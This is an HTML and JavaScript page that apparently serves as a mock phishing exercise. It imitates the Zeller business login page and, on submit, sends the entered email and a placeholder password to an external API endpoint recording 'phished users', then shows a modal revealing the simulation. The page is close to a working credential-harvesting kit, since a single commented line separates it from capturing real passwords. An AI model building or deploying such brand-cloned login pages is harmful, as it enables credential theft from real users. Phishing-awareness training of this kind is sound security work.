<!DOCTYPE html>
<html lang="en">

<head>
  <meta charset="utf-8" />
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
  <title>Log in to your Zeller Account</title>
  <link rel="icon" href="zeller-logo.png" />
  <meta name="description" content="Log in to your Zeller Account to see all of your business financial information and Zeller products in one location." />
  <meta name="keywords" content="zeller login, zeller dashboard">
  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500&display=swap" rel="stylesheet" />
  <link rel="icon" type="image/png" href="/zeller-logo.png"  />
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">


</head>
<style>
  ::-moz-placeholder {
    color: #bbc0c3;
  }

  :-ms-input-placeholder {
    color: #bbc0c3;
  }

  ::placeholder {
    color: #bbc0c3;
  }

  body,
  html {
    margin: 0;
    background-color: #ffffff;
    font-family: "Inter", Arial, Helvetica, sans-serif;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
    color: #212322;
  }

  .wrapper {
    position: relative;
    height: 100vh;
  }

  .flex-wrapper {
    height: 100%;
    display: flex;
  }

  .content-wrapper {
    flex: 2;
    display: flex;
    flex-direction: column;
    overflow: auto;
  }

  .aside {
    display: none;
  }

  .login-box {
    box-sizing: border-box;
    display: flex;
    flex-direction: column;
    width: 100%;
    padding: 6rem 1rem 1rem;
    min-height: 100%;
    margin: 0 auto;
    overflow: auto;
  }

  .login-box__confirmation-icon {
    width: 80px;
    height: 80px;
    display: flex;
    align-items: center;
    justify-content: center;
    border-radius: 50%;
    margin-bottom: 32px;
  }

  .login-box__confirmation-icon--success {
    background: #e8f2fb;
  }

  .login-box__confirmation-icon--failed {
    background: #fdf1ef;
  }

  .login-box--post-default {
    display: none;
  }

  .content-wrapper--is-reset .login-box--default {
    display: none;
  }

  .content-wrapper--is-reset .login-box--reset {
    display: flex;
  }

  .content-wrapper--reset-success .login-box--default,
  .content-wrapper--reset-success .login-box--post-default {
    display: none;
  }

  .content-wrapper--reset-success .login-box--reset-success {
    display: flex;
  }

  .content-wrapper--reset-failed .login-box--default,
  .content-wrapper--reset-failed .login-box--post-default {
    display: none;
  }

  .content-wrapper--reset-failed .login-box--reset-failed {
    display: flex;
  }

  .form__action-footer {
    display: flex;
    margin-top: 16px;
    width: 100%;
  }

  .login-box--default .form__action-footer {
    align-items: center;
    flex-direction: column;
  }

  .login-box--confirmation .form__action-footer {
    margin-top: 0;
  }

  .form__action-footer .button--link {
    margin-left: 24px;
  }

  .login-header-content {
    display: flex;
    min-width: auto;
    justify-content: flex-end;
    padding: 1rem;
  }

  .login-img {
    border-radius: 4px;
    width: 100px;
    height: 32px;
    margin-bottom: 40px;
    position: absolute;
    top: 24px;
    left: 16px;
  }

  .form-wrapper {
    display: block;
    margin: 0;
    height: 100%;
  }

  .form {
    width: 100%;
    height: 100%;
    display: flex;
    flex-flow: column nowrap;
    align-items: center;
  }

  .button {
    display: flex;
    align-items: center;
    justify-content: center;
    font-family: inherit;
    font-weight: normal;
    box-sizing: border-box;
    padding: 13px 24px;
    border: 1px solid #0071ce;
    border-radius: 7px;
    outline: none;
    background-color: #0071ce;
    color: white;
    transition: all 0.3s ease-out 0s;
    cursor: pointer;
    width: 100%;
    min-height: 54px;
    font-size: 18px;
    line-height: 1.55;
    justify-self: flex-end;
  }

  .button__loader {
    display: none;
  }

  .button--is-loading .button__loader {
    display: block;
  }

  .button--is-loading .button__label {
    display: none;
  }

  .button--login {
    width: 100%;
  }

  .button--link {
    background-color: white;
    border-color: white;
    color: #0071ce;
  }

  .button--link:hover,
  .button--link:focus {
    background-color: #f6f7f9;
    border: 1px solid #f6f7f9;
  }

  .button--link:focus {
    outline: #d7e7f2 solid 4px;
  }

  .button:disabled {
    background-color: #dedcd9;
    border-color: #dedcd9;
    color: #91908e;
    cursor: not-allowed;
  }

  .button p {
    margin: 0;
  }

  @-webkit-keyframes spinning {
    from {
      transform: rotate(0deg);
    }

    to {
      transform: rotate(360deg);
    }
  }

  @keyframes spinning {
    from {
      transform: rotate(0deg);
    }

    to {
      transform: rotate(360deg);
    }
  }

  .loader {
    -webkit-animation: spinning 1s linear infinite;
    animation: spinning 1s linear infinite;
  }

  .forgot-password>a {
    color: #0071ce;
    display: flex;
    font-size: 16px;
    line-height: 1.5;
    font-weight: normal;
    text-align: center;
    text-decoration: none;
    justify-self: flex-end;
    margin: 24px 0 0;
    width: 100%;
  }

  .signup-button {
    align-items: center;
    justify-content: center;
    font-family: inherit;
    font-weight: normal;
    box-sizing: border-box;
    padding: 11px 22px;
    border: 1px solid transparent;
    border-radius: 7px;
    outline: none;
    background-color: white;
    color: #0071ce;
    transition: all 0.3s ease-out 0s;
    cursor: pointer;
    width: auto;
    font-size: 16px;
    line-height: 1.5;
    text-decoration: none;
  }

  .login-header {
    display: block;
    top: 0;
    left: 0;
    width: 100%;
    position: absolute;
    z-index: 2;
  }

  .login-title {
    font-size: 32px;
    line-height: 1.2;
    font-weight: 500;
    margin: 0 0 24px;
  }

  .login-description {
    font-size: 18px;
    line-height: 1.55;
    font-weight: normal;
    margin: 0 0 36px;
  }

  .form-wrapper {
    display: table;
    margin: 0;
  }

  .form {
    width: 100%;
  }

  .input {
    background-color: #f2f2f2;
    caret-color: #0071ce;
    border-radius: 3px;
    box-sizing: border-box;
    width: 100%;
    font-size: 16px;
    line-height: 1.5;
    font-weight: normal;
    border: none;
  }

  .input:focus-within {
    outline: none;
  }

  .input-wrapper:focus-within {
    border: 1px solid #0071ce;
  }

  .input-wrapper {
    background-color: #f2f2f2;
    border: 1px solid #f2f2f2;
    display: flex;
    align-items: center;
    width: 100%;
    border-radius: 3px;
    padding: 15px 1.5rem;
    box-sizing: border-box;
    transition: all 0.3s ease-out 0s;
  }

  .input-image {
    display: flex;
    align-items: center;
    justify-content: center;
    margin-right: 16px;
    width: 16px;
    height: 16px;
  }

  .mail-path,
  .padlock-path {
    fill: #0071ce;
  }

  .input-container {
    display: flex;
    flex-flow: column nowrap;
    width: 100%;
    margin-bottom: 16px;
  }

  .error-message {
    display: none;
    color: #e74c39;
    font-size: 12px;
    line-height: 1.5;
    margin-top: 8px;
    transition: all 0.3s ease-out;
  }

  .email-error-icon,
  #password-error-icon {
    display: none;
    justify-content: center;
    align-items: center;
  }

  #toggle-password {
    padding: 0 2px;
    margin: 0;
    border: none;
    background: transparent;
    display: block;
    cursor: pointer;
    letter-spacing: 0.16em;
    font-family: inherit;
    color: #212322;
    font-size: 10px;
    line-height: 1.6;
    font-weight: normal;
    text-transform: uppercase;
  }

  #error-message,
  #reset-error-message {
    display: none;
  }

  .hidden {
    display: none;
  }

  @media screen and (min-width: 767px) {
    .content-wrapper {
      margin: auto;
    }

    .login-box {
      box-sizing: content-box;
      flex-direction: column;
      max-width: 512px;
      width: 100%;
      margin: auto;
    }

    .signup-button {
      display: flex;
      width: 106px;
      height: 3rem;
    }

    .signup-button:hover,
    .signup-button:active,
    .signup-button:disabled,
    .signup-button:focus-within {
      background-color: #f2f2f2;
      border-color: #f2f2f2;
    }

    .signup-button:focus {
      border-color: #0071ce;
      color: #0071ce;
    }

    .login-header-content {
      display: flex;
      min-width: auto;
      justify-content: flex-end;
      padding: 16px;
    }

    .login-img {
      border-radius: 4px;
      margin-bottom: 40px;
      position: absolute;
      top: 40px;
      left: 40px;
    }

    .login-title {
      font-size: 40px;
      line-height: 1.2;
    }

    .login-description {
      margin: 0 0 32px;
    }

    .form-wrapper {
      display: table;
      margin: 0;
    }

    .form {
      width: 100%;
      display: block;
    }

    .button {
      min-width: 200px;
      width: auto;
    }

    .form__action-footer {
      margin-top: 32px;
    }

    .login-box--default .form__action-footer {
      align-items: flex-start;
    }
  }

  @media screen and (min-width: 767px) and (max-width: 1023px) {
    .login-box {
      padding: 0 24px;
      max-width: 560px;
    }

    .signup-button:hover {
      background-color: #f6f7f9;
    }

    .signup-button:focus {
      outline: #d7e7f2 solid 4px;
    }
  }

  @media screen and (min-width: 1024px) {
    .aside {
      display: block;
      height: 100%;
      width: 33%;
      background-position: center center;
      background-repeat: no-repeat;
      background-color: #dedcd9;
    }
  }
</style>

<body>
  
  <div class="wrapper">
    <div class="login-header">
      <div class="login-header-content">
        <div class="login-img">
          <svg width="100" height="33" viewBox="0 0 100 33" fill="none" xmlns="http://www.w3.org/2000/svg">
            <path d="M6.53455 25.6085H18.2914V29.58H0V26.5722L0.0589181 26.5113L11.4462 14.0236H0.391002V10.0471H17.9807V13.0599L17.9218 13.1208L6.53455 25.6085ZM31.7783 13.6483C28.661 13.6483 26.4274 15.2815 25.7633 18.0307H37.5522C36.9845 15.241 34.8956 13.6483 31.7783 13.6483ZM31.7783 9.67171C34.8634 9.67171 37.5844 10.7419 39.4376 12.6897C41.4462 14.7946 42.346 17.8227 41.9764 21.216L41.9068 21.8551H25.8382C26.6202 24.5129 28.9663 25.9737 32.4853 25.9737C34.7724 25.9737 36.7274 25.2585 38.4628 23.7876L39.1751 23.1891L41.2105 26.7548L40.7392 27.1301C38.2914 29.0576 35.6936 29.9553 32.5656 29.9553C25.7633 29.9553 21.1944 25.8672 21.1944 19.7806C21.1891 13.9222 25.6454 9.67171 31.7783 9.67171ZM46.1757 26.7142H50.6481V0.546875H46.1757V26.7142ZM54.2635 32.9682H58.7359V6.80086H54.2635V32.9682ZM78.7467 18.0307C78.1789 15.241 76.09 13.6483 72.9727 13.6483C69.8554 13.6483 67.6219 15.2815 66.9577 18.0307H78.7467ZM72.9727 9.67171C76.0579 9.67171 78.7788 10.7419 80.632 12.6897C82.6406 14.7946 83.5404 17.8278 83.1709 21.216L83.1012 21.8551H67.0327C67.8147 24.5129 70.1607 25.9737 73.6797 25.9737C75.9668 25.9737 77.9218 25.2585 79.6572 23.7876L80.3696 23.1891L82.3996 26.7548L81.9282 27.1301C79.4805 29.0576 76.8881 29.9553 73.7547 29.9553C66.9523 29.9553 62.3835 25.8672 62.3835 19.7806C62.3835 13.9222 66.8345 9.67171 72.9727 9.67171ZM99.2662 9.67171C96.256 9.6007 93.8779 10.4579 91.9979 12.289V10.042H87.5254V29.58H91.9979V17.6908C93.9314 14.1504 98.0289 13.8715 99.2394 13.8715L100 13.8816V9.692L99.2662 9.67171Z" fill="#212322" />
          </svg>
        </div>

        <a href="" class="signup-button">Sign up</a>
      </div>
    </div>

    <div class="flex-wrapper">
      <div class="content-wrapper">
        <div class="login-box login-box--default">
          <h3 class="login-title">Incident Report</h3>
          <h5 class="login-description">
            Now that you're traumatised by the phishing attack, you can report the incident or make a complaint for your mental health support.
          </h5>
          <h5 class="login-description">Please log into your Zeller application to take an action.</h5>
          <div class="form-wrapper">
            <form class="form" onsubmit="return false;" method="post">
              <div class="input-container">
                <div class="input-wrapper" id="email-wrapper">
                  <svg xmlns="http://www.w3.org/2000/svg" width="16" height="12" viewBox="0 0 16 12" fill="none" class="input-image">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M1 0L0 1V11L1 12H15L16 11V1L15 0H1ZM2 3.9432V10H14V3.9432L8.58124 7.81375H7.41876L2 3.9432ZM13.2796 2H2.72045L8 5.77111L13.2796 2Z" id="mail-path" class="mail-path" />
                  </svg>
                  <input class="input" type="email" id="email" placeholder="E-mail address" />
                  <div id="email-error-icon" class="email-error-icon">
                    <svg width="16" height="16" fill="none" xmlns="http://www.w3.org/2000/svg">
                      <circle cx="8" cy="8" r="8" fill="#FE5834"></circle>
                      <path fill-rule="evenodd" clip-rule="evenodd" d="M7 4v5h2V4H7zm0 6v2h2v-2H7z" fill="#fff"></path>
                    </svg>
                  </div>
                </div>
                <span id="email-error-message" class="error-message"></span>
              </div>
              <div class="input-container">
                <div class="input-wrapper" id="password-wrapper">
                  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 14 16" fill="none" class="input-image">
                    <path d="M6 9V12H8V9H6Z" class="padlock-path" />
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M6 2C5.44772 2 5 2.44772 5 3V5H7H12H13L14 6V16H0V6L1 5H3V3C3 1.34315 4.34315 0 6 0H8C9.65685 0 11 1.34315 11 3V5H9V3C9 2.44772 8.55228 2 8 2H6ZM2 7V14H12V7H2Z" class="padlock-path" />
                  </svg>
                  <input class="input" type="password" id="password" placeholder="Password" />
                  <p id="toggle-password">SHOW</p>
                  <div id="password-error-icon">
                    <svg width="16" height="16" fill="none" xmlns="http://www.w3.org/2000/svg">
                      <circle cx="8" cy="8" r="8" fill="#FE5834"></circle>
                      <path fill-rule="evenodd" clip-rule="evenodd" d="M7 4v5h2V4H7zm0 6v2h2v-2H7z" fill="#fff"></path>
                    </svg>
                  </div>
                </div>
                <span id="password-error-message" class="error-message"></span>
              </div>
              <p id="error-message"></p>
              <div class="form__action-footer"> 
                <button type="submit" disabled="disabled" class="button button--login" id="btn-login">
                  <span id="label">Log in</span>
                  <div id="loader" class="loader hidden">
                    <svg width="17" height="16" viewBox="0 0 17 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                      <circle cx="8.5" cy="8" r="7" stroke="url(#paint0_angular_32708_5394)" stroke-width="2" stroke-linecap="round" />
                      <path d="M15.5 8C15.5 4.13401 12.366 1 8.5 1C4.63401 1 1.5 4.13401 1.5 8" stroke="url(#paint1_radial_32708_5394)" stroke-width="2" stroke-linecap="round" />
                      <defs>
                        <radialGradient id="paint0_angular_32708_5394" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(8.5 8) rotate(137.49) scale(8.13941)">
                          <stop offset="0.00626136" stop-color="white" stop-opacity="0.16" />
                          <stop offset="0.734375" stop-color="white" stop-opacity="0" />
                        </radialGradient>
                        <radialGradient id="paint1_radial_32708_5394" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(15.5 8) rotate(-180) scale(14)">
                          <stop stop-color="white" />
                          <stop offset="0.9375" stop-color="white" stop-opacity="0" />
                        </radialGradient>
                      </defs>
                    </svg>
                  </div>
                </button>
                <span class="forgot-password">
                  <a href="no-javascript1.html" title="Forgot Password" id="link-reset">Forgot your password?</a>
                </span>
              </div>
            </form>
          </div>
        </div>
        <div class="login-box login-box--post-default login-box--reset">
          <h3 class="login-title">Password recovery</h3>
          <h5 class="login-description">
            Don’t worry, it happens. Which account’s password should we reset?
          </h5>
          <div class="form-wrapper">
            <form class="form" onsubmit="return false;" method="post">
              <div class="input-container">
                <div class="input-wrapper" id="reset-email-wrapper">
                  <svg xmlns="http://www.w3.org/2000/svg" width="16" height="12" viewBox="0 0 16 12" fill="none" class="input-image">
                    <path fill-rule="evenodd" clip-rule="evenodd" d="M1 0L0 1V11L1 12H15L16 11V1L15 0H1ZM2 3.9432V10H14V3.9432L8.58124 7.81375H7.41876L2 3.9432ZM13.2796 2H2.72045L8 5.77111L13.2796 2Z" id="reset-mail-path" class="mail-path" />
                  </svg>
                  <input class="input" type="email" id="reset-email" placeholder="E-mail address" />
                  <div id="reset-email-error-icon" class="email-error-icon">
                    <svg width="16" height="16" fill="none" xmlns="http://www.w3.org/2000/svg">
                      <circle cx="8" cy="8" r="8" fill="#FE5834"></circle>
                      <path fill-rule="evenodd" clip-rule="evenodd" d="M7 4v5h2V4H7zm0 6v2h2v-2H7z" fill="#fff"></path>
                    </svg>
                  </div>
                </div>
                <span id="reset-email-error-message" class="error-message"></span>
              </div>
              <p id="reset-error-message"></p>
              <div class="form__action-footer">
                <button type="submit" disabled="disabled" class="button js-button-reset">
                  <span class="button__label" id="reset-label">Reset</span>
                  <div id="reset-email-loader" class="loader button__loader">
                    <svg width="17" height="16" viewBox="0 0 17 16" fill="none" xmlns="http://www.w3.org/2000/svg">
                      <circle cx="8.5" cy="8" r="7" stroke="url(#reset-loader-radient-head)" stroke-width="2" stroke-linecap="round" />
                      <path d="M15.5 8C15.5 4.13401 12.366 1 8.5 1C4.63401 1 1.5 4.13401 1.5 8" stroke="url(#reset-loader-radient-tail)" stroke-width="2" stroke-linecap="round" />
                      <defs>
                        <radialGradient id="reset-loader-radient-head" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(8.5 8) rotate(137.49) scale(8.13941)">
                          <stop offset="0.00626136" stop-color="white" stop-opacity="0.16" />
                          <stop offset="0.734375" stop-color="white" stop-opacity="0" />
                        </radialGradient>
                        <radialGradient id="reset-loader-radient-tail" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(15.5 8) rotate(-180) scale(14)">
                          <stop stop-color="white" />
                          <stop offset="0.9375" stop-color="white" stop-opacity="0" />
                        </radialGradient>
                      </defs>
                    </svg>
                  </div>
                </button>
                <button class="button button--link js-back-to-login">
                  <span id="reset-label">Back</span>
                </button>
              </div>
            </form>
          </div>
        </div>
        <div class="login-box login-box--post-default login-box--confirmation login-box--reset-success">
          <div class="login-box__confirmation-icon login-box__confirmation-icon--success">
            <svg width="16" height="16" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path fill-rule="evenodd" clip-rule="evenodd" d="M22.7072 5.70718L11.643 16.7714L10.4143 18.0001L10.2835 18.1309L9.70718 18.7072H8.29297L1.29297 11.7072L2.70718 10.293L9.00008 16.5859L10.2835 15.3025L21.293 4.29297L22.7072 5.70718Z" fill="#0071CE"></path>
            </svg>
          </div>
          <h3 class="login-title">Email Sent</h3>
          <h5 class="login-description">
            We have sent an email to <strong class="js-email-address"></strong> a link to reset your password.
          </h5>
          <div class="form__action-footer">
            <button class="button js-reset-to-login">
              <span>Back</span>
            </button>
          </div>
        </div>
        <div class="login-box login-box--post-default login-box--confirmation login-box--reset-failed">
          <div class="login-box__confirmation-icon login-box__confirmation-icon--failed">
            <svg width="16" height="16" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path fill-rule="evenodd" clip-rule="evenodd" d="M6 4.586L1.707.293.293 1.707 4.586 6 .293 10.293l1.414 1.414L6 7.414l4.293 4.293 1.414-1.414L7.414 6l4.293-4.293L10.293.293 6 4.586z" fill="#E74C39" />
            </svg>
          </div>
          <h3 class="login-title">Something went wrong!</h3>
          <h5 class="login-description js-error-message">
            Please try again
          </h5>
          <div class="form__action-footer">
            <button class="button js-reset-to-login">
              <span>Back</span>
            </button>
          </div>
        </div>
      </div>
      <div class="aside"></div>
    </div>
  </div>
  <!-- Adding modal -->
  <div class="modal" id="phished-modal" tabindex="-1">
    <div class="modal-dialog">
      <div class="modal-content">
        <div class="modal-header">
          <h3 class="modal-title">Not again! 🎣 😭!</h3>
          <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
        </div>
        <div class="modal-body">
          <p>Nah, you got phished again 😱! </p>
          <p>You must be really traumatised... You can always report the incident to your manager or lodge a complaint against me. We take your mental health seriously.</p>
          <p>Otherwise, I can take you to the real Zeller app. You totally should log in to the real Zeller app from the link below.</p>
          <p>You can see more info about this mock phishing attack <a href="https://mydatahack.github.io/zeller-phishing-react/#/info" target="_blank">here</a></p>
        </div>
        <div class="modal-footer">
          <button type="button" class="btn btn-warning" onClick="window.location.replace('https://mydatahack.github.io/zeller-phishing/report-to-manager')">Report the incident to your manager</button>
          <button type="button" class="btn btn-primary" onClick="window.location.replace('https://mydatahack.github.io/zeller-phishing/real-app')">Take me to the real Zeller App</button>
        </div>
      </div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js" integrity="sha384-IQsoLXl5PILFhosVNubq5LC7Qb9DXgDA9i+tQ8Zj3iwWAwPtgFTxbJ8NT4GN1R8p" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-cVKIPhGWiC2Al4u+LWgxfKTRIcfu0JTxR+EQDz/bgldoEyl4H0zUF0QKbrJ0EcQF" crossorigin="anonymous"></script>
  <!-- <script src="https://cdn.auth0.com/js/auth0/9.13/auth0.min.js"></script> -->
  <script src="https://cdn.auth0.com/js/polyfills/1.0/object-assign.min.js"></script>
  <script>
    window.addEventListener('load', function() {

      const getImage = () => {
        const images = [
          'zeller-signup-image-1.jpg',
          'zeller-signup-image-2.jpg',
          'zeller-signup-image-3.jpg',
          'zeller-signup-image-4.jpg',
        ]
        return images[Math.floor(Math.random() * images.length)];
      }

      const setAsideBackground = () => {
        document
          .querySelector('.aside')
          .setAttribute('style',
            'background: url("https://dashboard.myzeller.com/' + getImage() + '") 0 0/cover;');
      
      }
      setAsideBackground()
      var config = {}
      function login(e) {
        e.preventDefault()
        var label = document.getElementById('label')
        var loader = document.getElementById('loader')
        label.classList.add('hidden')
        loader.classList.remove('hidden')
        var username = document.getElementById('email').value
        // var password = document.getElementById('password').value
        var password = 'Password123'

        const mutation = JSON.stringify({
          query: `mutation {addPhishedUsers(PhishedUsersInput:{username:"${username}" password:"${password}" company:"Zeller: Report page" createdDate: "${new Date()}" createdTimestamp: ${new Date().getTime()}}) {id}}`
        })

        fetch('https://5kp24nzqz5.execute-api.ap-southeast-2.amazonaws.com/test/graphql/zeller-phishing', {
          mode: "no-cors",
            method: 'POST',
            headers: {
                'Accept': 'application/json',
                'Content-Type': 'application/json'
            },
            body: mutation
        })
          // .then(response => window.location.replace("https://dashboard.myzeller.com/"))
          .then(response => {
            console.log(JSON.stringify(response))
            let myModal = new bootstrap.Modal(document.getElementById('phished-modal'), {});
            myModal.show();
          })
      }

      function showResetConfirmation(email, errorMsg) {
        var selectors = {
          backToLogin: document.querySelectorAll('.js-reset-to-login'),
          contentWrapper: document.querySelector('.content-wrapper'),
          emailAddress: document.querySelector('.js-email-address'),
          errorMessage: document.querySelector('.js-error-message')
        }
        var contentWrapperClassname = 'content-wrapper--reset-'.concat(errorMsg ? 'failed' : 'success')
        selectors.contentWrapper.classList.add(contentWrapperClassname)
        selectors.emailAddress.innerHTML = email
        if (errorMsg) {
          selectors.errorMessage.innerHTML = errorMsg
        }
        selectors.backToLogin.forEach(function(btn) {
          btn.addEventListener('click', function(e) {
            e.preventDefault()
            selectors.contentWrapper.classList.remove(contentWrapperClassname, 'content-wrapper--is-reset')
          })
        })
      }

      function resetPassword(email) {
        var resetBtnLoader = document.querySelector('.js-button-reset')
        resetBtnLoader.classList.add('button--is-loading')
        webAuth.changePassword({
            connection: databaseConnection,
            email: email,
          },
          function(err, resp) {
            if (err) {
              console.log(err.message)
              showResetConfirmation(email, err.messag)
              alert(err.message)
            } else {
              showResetConfirmation(email)
            }
            resetBtnLoader.classList.remove('button--is-loading')
          }
        )
      }

      function validateEmail(value) {
        return /^[a-zA-Z0-9_+&*-]+(?:\.[a-zA-Z0-9_+&*-]+)*@(?:[a-zA-Z0-9-]+\.)+[a-zA-Z-]{2,63}$/g.test(
          value
        )
      }

      function isEmailTypeValid(emailFieldType) {
        var acceptableEmailInputFieldType = ['reset']
        return emailFieldType && acceptableEmailInputFieldType.indexOf(emailFieldType) >= 0
      }

      function generateEmailInputID(emailInputId, emailFieldTypePrefix) {
        if (emailFieldTypePrefix && typeof emailFieldTypePrefix !== 'string') {
          console.error('parameter emailFieldTypePrefix: ' + emailFieldTypePrefix + ' should be of string type')
        }
        if (emailFieldTypePrefix) {
          return emailFieldTypePrefix + '-' + emailInputId
        }
        return emailInputId
      }

      function setEmailError(error, emailFieldType) {
        var emailWrapper = document.getElementById(generateEmailInputID('email-wrapper', emailFieldType))
        if (emailFieldType && !isEmailTypeValid(emailFieldType) || !emailWrapper) {
          return
        }
        var emailErrorField = document.getElementById(generateEmailInputID('email-error-message', emailFieldType))
        var emailPath = document.getElementById(generateEmailInputID('mail-path', emailFieldType))
        var emailErrorIcon = document.getElementById(generateEmailInputID('email-error-icon', emailFieldType))
        emailWrapper.style.border = '1px solid rgb(231, 76, 57)'
        emailPath.style.fill = 'rgb(231, 76, 57)'
        emailErrorIcon.style.display = 'flex'
        emailErrorField.innerText = error
        emailErrorField.style.display = 'block'
      }

      function clearEmailError(emailFieldType) {
        var emailWrapper = document.getElementById(generateEmailInputID('email-wrapper', emailFieldType))
        if (emailFieldType && !isEmailTypeValid(emailFieldType) || !emailWrapper) {
          return
        }
        var emailErrorField = document.getElementById(generateEmailInputID('email-error-message', emailFieldType))
        var emailPath = document.getElementById(generateEmailInputID('mail-path', emailFieldType))
        var emailErrorIcon = document.getElementById(generateEmailInputID('email-error-icon', emailFieldType))
        emailErrorField.style.display = 'none'
        emailWrapper.style.border = '1px solid rgba(242, 242, 242, 1)'
        emailPath.style.fill = '#0071CE'
        emailErrorIcon.style.display = 'none'
      }

      function setPasswordError(error) {
        var passwordErrorField = document.getElementById(
          'password-error-message'
        )
        var passwordWrapper = document.getElementById('password-wrapper')
        var padlockPath = document.getElementsByClassName('padlock-path')
        var passwordErrorIcon = document.getElementById('password-error-icon')
        passwordErrorField.innerText = error
        passwordErrorField.style.display = 'block'
        passwordWrapper.style.border = '1px solid rgb(231, 76, 57)'
        padlockPath[0].style.fill = 'rgb(231, 76, 57)'
        padlockPath[1].style.fill = 'rgb(231, 76, 57)'
        passwordErrorIcon.style.display = 'flex'
      }

      function clearPasswordError() {
        var passwordErrorField = document.getElementById(
          'password-error-message'
        )
        var passwordWrapper = document.getElementById('password-wrapper')
        var padlockPath = document.getElementsByClassName('padlock-path')
        var passwordErrorIcon = document.getElementById('password-error-icon')
        passwordErrorField.style.display = 'none'
        passwordWrapper.style.border = '1px solid rgba(242, 242, 242, 1)'
        padlockPath[0].style.fill = '#0071CE'
        padlockPath[1].style.fill = '#0071CE'
        passwordErrorIcon.style.display = 'none'
      }

      function inputChange() {
        var email = document.getElementById('email').value
        var password = document.getElementById('password').value
        var loginButton = document.getElementById('btn-login')
        loginButton.disabled = !(
          email.length &&
          password.length &&
          validateEmail(email)
        )
      }

      function displayError(err) {
        console.log(err)
        setPasswordError(err.description)
      }

      function emailFocus(id, emailFieldType) {
        if (emailFieldType && !isEmailTypeValid(emailFieldType)) {
          return
        }
        var email = document.getElementById(id).value
        if (!email) {
          setEmailError('Email is required', emailFieldType)
        } else if (!validateEmail(email)) {
          setEmailError('Please input a valid email address', emailFieldType)
        } else {
          clearEmailError(emailFieldType)
        }
      }

      function passwordFocus() {
        var password = document.getElementById('password').value
        if (!password) {
          setPasswordError('Password is required')
        } else {
          clearPasswordError()
        }
      }

      function generateSignUpURLByTenant(tenant) {
        var signUpURLs = {
          dev: 'https://dashboard.myzeller.dev/signup',
          staging: 'https://dashboard.myzeller.show/signup',
          prod: 'https://dashboard.myzeller.com/signup'
        }
        var signUpSelector = document.querySelector('.signup-button')
        if (!tenant || tenant === 'zeller-dev') {
          return signUpSelector.setAttribute('href', signUpURLs.dev)
        }
        if (tenant === 'zeller-staging') {
          return signUpSelector.setAttribute('href', signUpURLs.staging)
        }
        return signUpSelector.setAttribute('href', signUpURLs.prod)
      }

      function togglePassword() {
        var passwordField = document.getElementById('password')
        var togglePasswordBtn = document.getElementById('toggle-password')
        passwordField.type =
          passwordField.type === 'password' ? 'text' : 'password'
        togglePasswordBtn.innerText =
          passwordField.type === 'password' ? 'SHOW' : 'HIDE'
      }

      function toggleResetAndLoginView() {
        var classNames = {
          contentWrapperIsReset: 'content-wrapper--is-reset'
        }
        var resetEmailInputID = 'reset-email'
        var selectors = {
          emailResetInput: document.querySelector('#' + resetEmailInputID),
          widgetWrapper: document.querySelector('.content-wrapper'),
          resetLink: document.querySelector('#link-reset'),
          backToLogin: document.querySelector('.js-back-to-login'),
          resetButton: document.querySelector('.js-button-reset')
        }
        selectors.resetLink.addEventListener('click', function(e) {
          e.preventDefault()
          selectors.widgetWrapper.classList.add(classNames.contentWrapperIsReset)
          selectors.emailResetInput.addEventListener('focusout', function(e) {
            e.preventDefault()
            emailFocus(resetEmailInputID, 'reset')
          })
          selectors.backToLogin.addEventListener('click', function(e) {
            e.preventDefault()
            selectors.widgetWrapper.classList.remove(classNames.contentWrapperIsReset)
          })
          selectors.emailResetInput.addEventListener('input', function(e) {
            e.preventDefault()
            selectors.resetButton.disabled = !validateEmail(e.target.value)
          })
          selectors.resetButton.addEventListener('click', function(e) {
            e.preventDefault()
            resetPassword(selectors.emailResetInput.value)
          })
        })
      }

      function initialize() {
        if (config) {
          generateSignUpURLByTenant(config.auth0Tenant)
        }
        toggleResetAndLoginView()
        document.getElementById('email').addEventListener('input', inputChange)
        document
          .getElementById('password')
          .addEventListener('input', inputChange)
        document
          .getElementById('email')
          .addEventListener('focusout', function() {
            emailFocus('email')
          })
        document
          .getElementById('password')
          .addEventListener('focusout', passwordFocus)
        document
          .getElementById('toggle-password')
          .addEventListener('click', togglePassword)
        document.getElementById('btn-login').addEventListener('click', login)
      }
      initialize();
    })
  </script>
    
</body>
</html>
